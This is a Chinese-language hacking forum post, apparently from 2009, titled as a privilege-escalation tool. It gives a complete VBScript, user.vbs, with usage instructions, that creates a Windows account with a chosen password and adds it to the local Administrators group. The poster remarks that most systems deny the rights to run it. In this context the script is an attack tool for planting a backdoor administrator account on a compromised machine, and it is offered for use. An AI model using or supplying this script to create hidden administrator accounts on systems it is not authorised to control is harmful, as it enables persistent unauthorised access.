设为首页收藏本站

新微赢技术网

 找回密码
 注册
搜索
热搜: 回贴
查看: 12335|回复: 1
打印 上一主题 下一主题

user.vbs 提权

[复制链接]
跳转到指定楼层
1#
发表于 2009-11-28 01:47:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
用法:   cscript user.vbs 用户名 密码
例如: cscript user.vbs cc cc   '增加了一个用户名为cc密码为cc 的用户 并且这个用户是管理员组的
user.vbs
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next
Wscript.echo struser & " 用户建立失败!"
ok ! 不过大部分系统是没有执行的权限的....
您需要登录后才可以回帖 登录 | 注册

本版积分规则

申请友链|小黑屋|最新主题|手机版|新微赢技术网 ( 苏ICP备08020429号 )  

GMT+8, 2024-11-18 10:47 , Processed in 0.075344 second(s), 10 queries , Gzip On, Memcache On.

Powered by xuexi

© 2001-2013 HaiAn.Com.Cn Inc. 寰耽

快速回复 返回顶部 返回列表